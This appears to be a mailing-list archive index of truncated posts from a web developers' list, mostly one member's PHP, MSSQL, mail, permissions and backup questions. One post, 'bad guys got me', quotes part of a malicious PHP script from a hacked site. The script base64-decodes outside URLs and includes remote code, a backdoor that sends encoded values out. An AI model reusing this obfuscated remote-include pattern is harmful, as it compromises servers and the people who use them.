Re: [wdvltalk] strange mssql problem

2008-12-08 Thread steve miller
Thanks for the thoughts Zach. It is definitely a table, not a view. We did try pasting on of the sql staements into our interface, and the update worked fine. This means the actual syntax is correct and the table is up-dateable. Just can't get it to work from within php... steve O

Re: [wdvltalk] aol mail

2008-12-01 Thread steve miller
Thanks Sheila. I did consult that page a while back, and applied all that I could understand :) steve On Dec 1, 2008, at 12:05 PM, Sheila Fenelon wrote: > Hi Steve, > > Maybe this page will help > http://postmaster.aol.com/guidelines/bestprac.html > > > Sheila &g

Re: [wdvltalk] aol mail

2008-12-01 Thread steve miller
script is not, and not sure any of these aol users would know how to tell me what headers were received. steve On Dec 1, 2008, at 11:13 AM, David Precious wrote: > steve miller wrote: >> Sorry if this is a repeat, but I could still use some help... >> I am sending mail using

[wdvltalk] aol mail

2008-12-01 Thread steve miller
$mailfrom .= "Content-type: text/html; charset=utf-8\r\n"; $mailfrom .= "From: $ev_admin <$admin_email1>\r\n"; $mailfrom .= "Return-path: <$admin_email1>\r\n"; $mailfrom .= "Reply-To: $admin_email1\r\n"; Any suggestions? steve • The WDVL Discus

Re: [wdvltalk] writeable directories

2008-11-26 Thread steve miller
wrote: Quoting steve miller <[EMAIL PROTECTED]>: Still confused on a few things: PHP uploads to a temp directory and then you need a script to move the file. In oscommerce, there is no way for someone to access the upload scripts unless they have access to the protected admin directory fir

Re: [wdvltalk] writeable directories

2008-11-26 Thread steve miller
I'll test! Sure hope it's not this easy, because it means that directory permissions are not going to stop anything :( On Nov 26, 2008, at 10:09 AM, Matthew Macdonald-Wallace wrote: Quoting steve miller <[EMAIL PROTECTED]>: Still confused on a few things: PHP uploads to

Re: [wdvltalk] writeable directories

2008-11-26 Thread steve miller
sible they are getting in from some other domain on the server? steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html/ Send Your Posts To: wdv

Re: [wdvltalk] writeable directories

2008-11-26 Thread steve miller
directory first. So, how do they get the bad stuff into an open directory in the first place? steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html

Re: [wdvltalk] writeable directories

2008-11-26 Thread steve miller
uot; > deny from all < /FilesMatch > steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html/ Send Your Posts To: wdvltalk@lists.wdvl

[wdvltalk] writeable directories

2008-11-26 Thread steve miller
f 777 is a hole, why are applications still being written with this requirement? thanks for any guidance! steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionli

[wdvltalk] need aol mail help

2008-11-25 Thread steve miller
but was wondering if someone could let me know if there is a complete explanation somewhere that I could read up on. thanks! steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters

Re: [wdvltalk] strange mssql problem

2008-11-20 Thread steve miller
Hi Tim, I'll check, but I'm almost positive there is a primary key because this is a main "Customer" table which identifies all the important info about the clients. steve On Nov 20, 2008, at 9:35 AM, Furry, Tim wrote: > steve wrote... > We are using php to

Re: [wdvltalk] strange mssql problem

2008-11-19 Thread steve miller
I'll check on the field types and give it a whirl. thanks! On Nov 19, 2008, at 12:58 PM, Cheryl Hewitt wrote: You are using MS SQL, right? If you are using a view then you can set rights as to what the view can do (i.e. select, update, delete) for a specific user role. It is just a level of

Re: [wdvltalk] strange mssql problem

2008-11-19 Thread steve miller
e anything different from the other tables that we CAN update. The strange thing is that we can update one table, and using the same connect strings and user we can't update the other. I'll pass this along and see what comes up! thanks On Nov 19, 2008, at 10:52 AM, Ross Clutterbuck wrote

[wdvltalk] strange mssql problem

2008-11-19 Thread steve miller
ren't working? Any help appreciated. steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html/ Send Your Posts To: wdvltalk@lists.wdvl.com

Re: [wdvltalk] url rewrite help needed

2008-10-20 Thread steve miller
it, they might not use it. We have a secure login and a certificate on the site, so any sensitive info will be difficult to see. However, but we were hoping to make it difficult to even hit so parents would feel more comfortable. I know that we will never hide it completely, we just wa

Re: [wdvltalk] url rewrite help needed

2008-10-20 Thread steve miller
OK. Thanks for the thoughts. steve On Oct 19, 2008, at 9:23 PM, Sheila Fenelon wrote: > steve miller wrote: >> Hi Sheila. >> >> Guess I'm being thick here, but wouldn't the logged in visitor >> still see >> the url to the intermediate script? >>

Re: [wdvltalk] url rewrite help needed

2008-10-19 Thread steve miller
On Oct 19, 2008, at 8:37 PM, Hassan Schroeder wrote: On Sun, Oct 19, 2008 at 4:58 PM, steve miller <[EMAIL PROTECTED]> wrote: In this way, school members log into edline first with a username and pw, then they see the link to the private site. So, I'm hoping I unde

Re: [wdvltalk] url rewrite help needed

2008-10-19 Thread steve miller
Hi Sheila. Guess I'm being thick here, but wouldn't the logged in visitor still see the url to the intermediate script? Or are you thinking it will happen so fast that they won't be able to read it? steve On Oct 19, 2008, at 8:28 PM, Sheila Fenelon wrote: steve miller

Re: [wdvltalk] url rewrite help needed

2008-10-19 Thread steve miller
he variable but hide it by re-writing the url. Is something like that possible? steve OK, got it. If it were me, I'd probably just put the values in question in a lookup table with an associated ID and put the ID in the URL. Since the relationship of the ID and value is arbitrary, there&

Re: [wdvltalk] url rewrite help needed

2008-10-19 Thread steve miller
being very helpful. If I had server or site access (or just a helpful tech), I could do lots of things, but no luck. So, I am stuck with a simple url and I'd like to hide the variable being sent. steve On Oct 19, 2008, at 12:58 PM, Hassan Schroeder wrote: On Sun, Oct 19, 2008 at 9:10 A

[wdvltalk] url rewrite help needed

2008-10-19 Thread steve miller
value. Is it possible to send this string, but have it show in the url bar as something else, like index.html or index.html?this=gibberish so no one can easily see what I am sending? Thanks! Steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email

Re: [wdvltalk] http_referer

2008-09-30 Thread steve miller
Guess I should have looked :o) There is someone else at the school who normally interacts with edline, and she said she could only add links. Guess I'll have to dig in a little... Thanks again. On Sep 30, 2008, at 12:52 PM, David Precious wrote: steve miller wrote: Kind of thoug

Re: [wdvltalk] http_referer

2008-09-30 Thread steve miller
Kind of thought so. The linking site is a large institutional site that I'm sure will not allow me that kind of access. The only thing I can put on it is a link; might be able to put up a form with a hidden variable, but I doubt it. Thanks for the idea. steve On Sep 30, 2008, at

[wdvltalk] http_referer

2008-09-30 Thread steve miller
e in from the right place? Thanks, Steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html/ Send Your Posts To: wdvltalk@lists.wdvl.com To chan

Re: [wdvltalk] hide image source

2008-08-10 Thread steve miller
On Aug 9, 2008, at 8:51 PM, David Precious wrote: So, think there is a way to do the background="image.php" kind of thing? Yep - the browser doesn't care what kind of URL you give it for the background image - if it's an URL which, when requested, returns a usable image, then it's all g

Re: [wdvltalk] hide image source

2008-08-09 Thread steve miller
Wow: simple!! Thanks!! On Aug 9, 2008, at 11:01 AM, Sheila Fenelon wrote: > steve miller wrote: >> >> So, think there is a way to do the background="image.php" kind of >> thing? >> > > Try using the complete URL for image.php, starting with http://

Re: [wdvltalk] hide image source

2008-08-09 Thread steve miller
On Aug 9, 2008, at 9:44 AM, David Precious wrote: steve miller wrote: Could use some help with hiding an image source: Doing a photographer site without flash, and trying to make it as difficult to get to a filename as possible. I have used php files to generate images using the image tag

[wdvltalk] hide image source

2008-08-09 Thread steve miller
is easy to drag these to the desktop with a mac. My thought was to put these as a table background (which makes it impossible to drag) leaving only a screenshot as the way to steal. Problem is that using background="image.php" doesn't seem to work... Any thoughts? Thank

[wdvltalk] query help correction

2008-07-08 Thread steve miller
I'm sorry, but my last post should have said MS sql and not mysql! thanks! steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html/ Send

[wdvltalk] mysql query help needed

2008-07-08 Thread steve miller
and mysql complains! Is there any way to write this so that mysql will accept it? If not, I'll have to pull all info and hold in arrays for comparison, which I'd rather not do... Thanks for any ideas :) steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, S

Re: [wdvltalk] bad guys got me

2008-06-17 Thread steve miller
Thanks David. I did some reading already as Sheila suggested, and found one vulnerability that I sent on to my host. This stuff twists my stomach, but I guess is "learning the hard way"... steve On Jun 17, 2008, at 3:54 PM, David Precious wrote: > steve miller wrote: >>

Re: [wdvltalk] bad guys got me

2008-06-17 Thread steve miller
haven't done so already, you should notify your host. > > > Sheila > > > steve miller wrote: >> Hello... >> I just found a bad script on my website :( >> Can anyone here tell me what they might have stolen? >> Here is the script: >> error_reporting

[wdvltalk] bad guys got me

2008-06-17 Thread steve miller
ase64_encode ($i).".".base64_encode($j); if ((include(base64_decode ("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){} else if (include(base64_decode("aHR0cDovLw==").base64_decode ("d3d3My54bWxkYXRhLmluZm8=")."/?".$str))

Re: [wdvltalk] encryption help

2007-09-14 Thread steve miller
sent to the old app and to the new app. steve On Sep 14, 2007, at 12:09 PM, Sheila Fenelon wrote: Can you add a field to the current table? Sheila steve miller wrote: Hi Sheila. I'll ask him but I think it's because then we have to maintain 2 tables in 2 different database

Re: [wdvltalk] encryption help

2007-09-14 Thread steve miller
Hi Sheila. I'll ask him but I think it's because then we have to maintain 2 tables in 2 different databases. The IT guy has them go into the present system every few months to change pw's, and it's one more place they have to go. steve On Sep 14, 2007, at 11:39 AM,

Re: [wdvltalk] encryption help

2007-09-14 Thread steve miller
Jon, The all 26 a's turned up as: 0xFBFFF9F4FB1521FCFBFFF9F4FB1521FCFBFF steve On Sep 14, 2007, at 10:03 AM, Jon Haworth wrote: Hi Steve, Might I just say this could be the best Friday afternoon question ever :-) Looks like some kind of byte codes; when we enter new passwords,

Re: [wdvltalk] encryption help

2007-09-14 Thread steve miller
B01FA 0xFB01FA abbb0xFB01FAF40xFB01FAF5 a 0xFB01FAF4EE 0xFB01FAF5FC A through z results in 0xFB01FBF7FF1A2704040904FF08222F0C0C11 All letters are converted to lowercase first and no special characters are accepted . steve On Sep 14, 2007, at

Re: [wdvltalk] encryption help

2007-09-14 Thread steve miller
Thanks Jon. I forwarded your ideas to the client and he is going to run some more tests and send me back the results. He's pretty excited! steve On Sep 14, 2007, at 10:44 AM, Jon Haworth wrote: Having done some testing... one way of interpreting your example is that it's sta

Re: [wdvltalk] encryption help

2007-09-14 Thread steve miller
they would share their algorithm, and they declined. So...we thought if we could reverse-engineer it, and could simply use the existing data for our new application. However, I'll pass along your comments to make sure the IT person hasn't overlooked somethoing. steve Steve, Bef

Re: [wdvltalk] encryption help

2007-09-14 Thread steve miller
Nope; unfortunately it's a compiled application that the client has no access to. steve On Sep 14, 2007, at 9:13 AM, Sheila Fenelon wrote: steve miller wrote: I have a client who wants me to use the usernames/passwords in an existing database as the authentication for a ne

[wdvltalk] encryption help

2007-09-14 Thread steve miller
irection to try to figure out how it's being done? Thank you for any ideas, steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html/ Send You

[wdvltalk] semi mass emailing

2007-05-18 Thread steve miller
ble which holds an html string, and send that along with the necessary headers for html email to the list. Can anyone point me to some cgi code that I could use to send it? Thanks! steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTEC

Re: [wdvltalk] ftp help

2007-03-07 Thread steve miller
Thanks David. I have already written something like you have below, which works well. However, I think my host has their servers set up so I can't override php settings, because I can't change the timeout. But I plan to try running it via cron to see what happens. steve On M

Re: [wdvltalk] ftp help

2007-03-07 Thread steve miller
Thanks for the insight. My other idea was to tar the whole thing, ftp it, and try to untar at the other end. Problem is that I don't have that kind of access there. Guess I'll have to play a bit to see how far I can get! steve On Mar 7, 2007, at 12:32 PM, Sheila Fenelon w

Re: [wdvltalk] ftp help

2007-03-07 Thread steve miller
Kind of makes sense. I have run scripts from crons before, so that part I know how to do. The timeout issue was the problem, and it might be the server config; I'm not sure. What I was thinking was that I could run an exec within php that executes the ftp statement like on a command line, bu

Re: [wdvltalk] ftp help

2007-03-07 Thread steve miller
yes, I can cron! On Mar 7, 2007, at 10:03 AM, Sheila Fenelon wrote: steve miller wrote: Hi all. Probably a simple question for *nix people, but not for a newbie :) I want to ftp the contents of a large directory from one server to another (probably 300 files @ 20MB each). I have the login

[wdvltalk] ftp help

2007-03-07 Thread steve miller
hell program or something? Any help appreciated! steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html/ Send Your Posts To: wdvltalk@lists.wdv

[wdvltalk] test

2006-11-13 Thread steve miller
just testing; none of my posts are getting through • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html/ Send Your Posts To: wdvltalk@lists.wdvl.com T

[wdvltalk] ldap

2006-11-13 Thread steve miller
ugh a browser?" He thinks it may not be due to some MS security issue. Does this question make any sense? Does anyone know the answer, or could help me understand the issue enough to solve our problem? Thanks for any guidance, steve • The WDVL Discussion List from WDVL.COM •

[wdvltalk] php ldap query

2006-11-11 Thread steve miller
urity issue. Does this question make any sense? Does anyone know the answer, or could help me understand the issue enough to solve our problem? Thanks for any guidance, steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EM

[wdvltalk] FreeMed.fax

2006-11-07 Thread steve miller
greatly appreciated! steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html/ Send Your Posts To: wdvltalk@lists.wdvl.com To change subscription

Re: [wdvltalk] excel writer

2006-08-22 Thread steve miller
s a jpeg) into the spreadsheet and then download it to the desktop. I can do everything except the "insert jpeg" part... thanks! steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-

Re: [wdvltalk] excel writer

2006-08-22 Thread steve miller
Peter, I am using the standard spreadsheet_excel_writer package, and I don't see support for jpgs; how are you doing it? steve On Aug 21, 2006, at 5:39 PM, Peter MacGregor wrote: Must be something to do with your php program - I've just dropped a couple of jpegs into the no

[wdvltalk] excel writer

2006-08-21 Thread steve miller
Hi all. I am creating excel spreadsheets in php using spreadsheet_excel_writer (a Pear package), which works quite well. However, now I need to insert a jpg logo file into the spreadsheet, and this only supports bitmaps. Anyone have any pointers on how to insert jpgs? Thanks, steve

[wdvltalk] javascript form validation

2006-08-02 Thread steve miller
Greetings. I have a client who has a cart form with textboxes, radio buttons, and checkboxes with names like "OPTION|01_Name_of_school|STDDIP", etc so the cart will recognize them. However, she wants to use javascript in the page to make sure everything is filled in or selected, and I keep g

Re: [wdvltalk] midi player problem

2006-07-09 Thread steve miller
Thanks Riva. Anything and everything helps me focus down to the solution! steve On Jul 9, 2006, at 9:24 AM, Portman wrote: I don't have an answer to your question but I did notice recently that when I use headphone on my Dell computer (IE6 and XP), I cannot change the volume eith

Re: [wdvltalk] midi player problem

2006-07-09 Thread steve miller
Thanks Ann. I'll pass that along and see if it works. steve On Jul 9, 2006, at 10:47 AM, Ann Dietz wrote: Steve, We have several Dell laptops running IE6 and Win XP in our household -- some with separate audio cards and some with 'built-in'. When I click on 'Sound a

[wdvltalk] midi player problem

2006-07-09 Thread steve miller
me to 50%, 40%, 30%...etc, the volume on his machine does not change. Anyone heard of this or know a solution? He wants to play some midi file, and I don't know any other payer to use. These all work fine on my Win2000/IE6 box. Thanks for any input, steve • The WDVL Discussion

[wdvltalk] midi music in IE

2006-07-08 Thread steve miller
s not change. Anyone heard of this or know a solution? He wants to play some midi file, and I don't know any other payer to use. These all work fine on my Win2000/IE6 box. Thanks for any input, steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email

Re: [wdvltalk] unix help

2006-05-26 Thread steve miller
Thanks; I'll try anything because I'm really shootin' in the dark :) steve On May 26, 2006, at 1:21 PM, Sheila Fenelon wrote: steve miller wrote: I am trying to execute a shell script containing a simple tar command using a cron job, and I ain't no good at this! I c

[wdvltalk] unix help

2006-05-26 Thread steve miller
myweb/www I am attempting to tar the whole "www" directory, then I'll ftp it to another site for storage. I set up a cron to run: home/myweb/www/exec_tar.sh This isn't working...am I even close? lost, steve • The WDVL Discussion List from WDVL.COM • To Join

Re: [wdvltalk] site backup

2006-04-13 Thread steve miller
... - Original Message - From: "steve miller" <[EMAIL PROTECTED]> To: Sent: Thursday, April 13, 2006 3:36 PM Subject: [wdvltalk] site backup Hi all. Getting requests for things I know nothing about! I think this falls under the category "unix": A client wa

[wdvltalk] sorry

2006-04-13 Thread steve miller
I was a little pre-mature with my last email about remote backups...sorry :( I found a great site here: http://www.hostlibrary.com/Remotebackupusingsshtarandcron-how-to.html steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED

[wdvltalk] site backup

2006-04-13 Thread steve miller
but is it possible to write from one server to another? I'm sure this deals with some kind of secure connection, but can someone advise me on how this could be done? Thanks, steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTEC

Re: [wdvltalk] submit multiple forms

2006-04-12 Thread steve miller
Thanks Jonathan. Someone else mentioned curl, but I am not familiar with it at all. Guess it needs to go on my list! thanks, steve On Apr 12, 2006, at 5:38 PM, Jonathon Smith wrote: If you have access to CURL you could submit the form to an intermediate page that loops through the submitted

Re: [wdvltalk] submit multiple forms

2006-04-12 Thread steve miller
Thank Charles. I like the idea of sockets, so I'll take a look. And unfortunately no, I don't have access the receiving scripts. thanks, steve On Apr 12, 2006, at 5:50 PM, [EMAIL PROTECTED] wrote: Took a look around at what ive done and been experimenting with - drew a blank, and

Re: [wdvltalk] submit multiple forms

2006-04-12 Thread steve miller
Thanks Deb. I'll have to take a look at these, but I'm not sure they will work. I never know how many forms will have to be sent, as it depends on how many selections the user makes. Thanks, steve On Apr 12, 2006, at 2:05 PM, PBC Web Design wrote: At 11:25 AM 4/12/2006, you

Re: [wdvltalk] submit multiple forms

2006-04-12 Thread steve miller
Hi Charles. Using php at this point. Thanks, steve On Apr 12, 2006, at 2:19 PM, [EMAIL PROTECTED] wrote: What scripting language are you writing in? Charles On 12 Apr 2006 at 12:25, steve miller wrote: Hi all. I have a client who uses an opt-in mail list service to send out newsletters

[wdvltalk] submit multiple forms

2006-04-12 Thread steve miller
blockers break it. Is there another way to do this; submit multiple forms from one script? The receiving application will not take a "get", only a "post". Thanks for any help. steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:

[wdvltalk] test

2006-03-19 Thread steve miller
this is a test..seems like my posts are not getting through... steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html/ Send Your Posts To

[wdvltalk] wits end

2006-01-09 Thread steve miller
?xx=1"); exit(); and got this error: "Warning: Cannot modify header information" When I removed the blank lines, it worked!! Wish I had thought of that yesterday :( Thanks for the help, steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Ema

Re: [wdvltalk] location: wits end

2006-01-09 Thread steve miller
mplete URLs (eg http://www.example.com/index.php) Try that and see what happens Dan -- -Original Message- From: steve miller [mailto:[EMAIL PROTECTED] Sent: 09 January 2006 16:56 To: wdvltalk@lists.wdvl.com Subject: Re: [wdvltalk] location: wits end Hi Dan. die() and exit() stop the script, but I am get

Re: [wdvltalk] location: wits end

2006-01-09 Thread steve miller
No problem. Thanks for the thoughts. On Jan 9, 2006, at 11:52 AM, Portman wrote: PLEASE DISREGARD MY LAST E-MAIL! Eek! steve miller wrote: Hi all. I am at my wits end trying to figure out why the following php does not work: switch ($no) { case "1": echo "1"

Re: [wdvltalk] location: wits end

2006-01-09 Thread steve miller
ot;3"; exit(); } prints out 2 and 3, then quits with no re-direct. The thing that puzzles me is that this same exact code works in some pages in the same directory on the site, but not in others. What could cause that? steve On Jan 9, 2006, at 11:08 AM, Dan Parry wrote: Try using the

[wdvltalk] location: wits end

2006-01-09 Thread steve miller
on other pages in this site and they work fine! Any ideas on what to look for? steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html/ Send Y

[wdvltalk] Training advice

2005-12-22 Thread steve miller
this involves knowing about COM and Exchange Server, but I know little about them. My question is: what types of courses/training should I look into in order to gain the skills necessary to handle their new stuff? Thanks! steve • The WDVL Discussion List from WDVL.COM • To Join

Re: [wdvltalk] php mail()

2005-10-28 Thread steve miller
"User/Group" was set to nobody(99)/99 and "sendmail_from" did have no value. However, just for info sake, I set $mailfrom="[EMAIL PROTECTED]" to $mailfrom="From: [EMAIL PROTECTED]" and all worked. Thanks for the suggestions! On Oct 27, 2005, at 10

Re: [wdvltalk] php mail()

2005-10-27 Thread steve miller
Thanks! That makes some sense and gives me a good place to start. steve On Oct 27, 2005, at 9:49 PM, Mark Groen wrote: - Original Message - From: "steve miller" <> To: Sent: Thursday, October 27, 2005 6:19 PM Subject: [wdvltalk] php mail() Hi all. Could use so

[wdvltalk] php mail()

2005-10-27 Thread steve miller
ot;email stuff here"; mail($mailto,$mailsubject,$mailbody,$mailfrom); When the email is received and viewed, the reply-to address is "[EMAIL PROTECTED]" instead of "[EMAIL PROTECTED]". Where is "[EMAIL PROTECTED]" coming from (a server setting?) and how do I chang

Re: [wdvltalk] create Outlook task using php

2005-10-06 Thread steve miller
Thanks! On Oct 6, 2005, at 9:53 AM, Mark Groen wrote: - Original Message - To: Sent: Thursday, October 06, 2005 6:37 AM Subject: RE: [wdvltalk] create Outlook task using php Does anyone have any good sources for how to create/manipulate Outlook tasks using php? I doubt it since

Re: [wdvltalk] permissions help

2005-10-06 Thread steve miller
Thanks Sheila. I don't think they actually got to the upload script; I think they somehow found the open directory and posted the program directly. I'll check into .htaccess. steve On Oct 6, 2005, at 7:46 AM, Sheila Fenelon wrote: steve miller wrote: Patrick, The php scripts r

[wdvltalk] create Outlook task using php

2005-10-06 Thread steve miller
Does anyone have any good sources for how to create/manipulate Outlook tasks using php? Thanks • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html/

Re: [wdvltalk] permissions help

2005-10-06 Thread steve miller
Patrick, The php scripts run as "www" on the webserver, but the directories are owned by "steve" and I believe that group is "wheel". I don't really have access to be able to change all the file owners. The problem is that I need "www" to have &q

[wdvltalk] permissions help

2005-10-05 Thread steve miller
images copies into them, but this exposes them to the outside world and creates a security problem. I have tried changing permissions to 766, but the uploads don't work. I sure could use some guidance on what permissions to use, or how to get this secure and working. thanks! steve

Re: [wdvltalk] Image maps

2005-07-25 Thread Steve Olson
On Jul 25, 2005, at 2:58 PM, Portman wrote: Can a web page have more than one image map on it? Yes. Not a problem at all. Simply distinct Map declarations. HTH, Steve Olson, Web Development Alyption Media Group 114 W. Pine St, Suite C Sandpoint, ID 83864 208.263.5886 (office

Re: [wdvltalk] text editor for apple OS

2005-07-12 Thread Steve Olson
the editor must be fine, right;-) Kind regards, Steve Olson P.O. Box 213 Sandpoint, ID 83864 208.304.9064 (cell) [EMAIL PROTECTED] • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.int

Re: [wdvltalk] text editor for apple OS

2005-07-11 Thread Steve Olson
The delete key for mac is FN+delete. Thanks, Will! Steve Olson P.O. Box 213 Sandpoint, ID 83864 208.304.9064 (cell) [EMAIL PROTECTED] • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e

Re: [wdvltalk] text editor for apple OS

2005-07-11 Thread Steve Olson
ilt-in FTP clients. I'll be trying out editors in the next day or two. I just figured out that Finder = Windows Explorer, and got my data folder tree copied from a USB backup drive onto the apple, so I'm making progress:) Kind regards, Steve Olson P.O. Box 213 Sandpoint, ID

Re: [wdvltalk] text editor for apple OS

2005-07-11 Thread Steve Olson
> Replace ctrl key with the apple key and that will usually do it. It works! Apl-c = ctrl-c. Thanks, Cheryl. > Text wrangler is a good program, so I agree with Stephen about it. I'll put that one at the top of my list. Thanks for your help. Steve Olson P.O. Box 213 Sandpoin

Re: [wdvltalk] text editor for apple OS

2005-07-11 Thread Steve Olson
Thanks for the editor suggestions. I don't understand the SFTP reference, though. On windows, I use CuteFTP Pro as my FTP client. Does apple have something built in for FTP, or does skEdit have SFTP built in? Kind regards Steve Olson P.O. Box 213 Sandpoint, ID 83864 208.304.9064 (c

[wdvltalk] text editor for apple OS

2005-07-11 Thread Steve Olson
Hello all, I am in the midst of changing to a new computer, and hope that list members can give me some advice.I have been using Intel machines for years, and have just switched to an Apple PowerBook G4. It's my first trip into apple land, and I'm still a bit disoriented... On my wi

Re: [wdvltalk] refresh a php page

2005-04-17 Thread steve miller
Gotcha. steve On Apr 17, 2005, at 5:40 PM, Stephen Caudill wrote: A page load is always a GET request. By adding the true parameter tothe reload method, you're simply forcing the browser to retrieve afresh copy of the page from the server rather than reloading thecache. - Stephen

Re: [wdvltalk] refresh a php page

2005-04-17 Thread steve miller
Thanks Stephen. The original page uses POST to send the variables. Is there a way to force a new HTTP POST instead of a GET? steve On Apr 16, 2005, at 8:46 PM, Stephen Caudill wrote: Steve, the reload method takes a parameter that forces a new HTTP GET...Typically you should only use this if

[wdvltalk] refresh a php page

2005-04-16 Thread steve miller
all messed up. It does not seem to reload with all the same variables that were originally sent. If I hit the browser refresh button, all works fine. Is there a way to mimic the browser refresh? Thanks! steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To

[wdvltalk] nevermind

2005-04-14 Thread steve miller
Please ignore my earlier post about resizing windows...now it works with resizeble=yes...go figure! steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com

[wdvltalk] open window help

2005-04-14 Thread steve miller
the window resizeable. I have tried resizeable=yes, resizeable=1, resizable=yes, resizable=1 and none work. I have even left it out so it will default to "yes", but no workie. Any ideas? Thanks, steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Emai

[wdvltalk] Created Excel files

2005-03-10 Thread steve miller
header("Cache-Control: must-revalidate, post-check=0,pre-check=0"); header("Pragma: public"); header("Content-Length: ". filesize($filename)); readfile($filename); } Any ideas why the mess? Thanks, steve • The WDVL Discus

Re: [wdvltalk] javascript help

2005-03-09 Thread steve miller
Thanks for the help. I know this does not look elegant, but it works! :) I was getting some NAN errors, so I put in a few more checks. Thanks both, steve var i = 0; while (document.getElementById("singles" + i) != null) { if(document.getElementById("

Re: [wdvltalk] javascript help

2005-03-09 Thread steve miller
Thanks! steve On Mar 9, 2005, at 3:24 PM, Stephen Caudill wrote: Steve, I don't get a script error in IE or FF. It works in IE(6) fine for me, but FF does not. Looking at your script, in the function tallyUp(), you may try changing your element acquisition to use an eval... instead of:

  1   2   3   >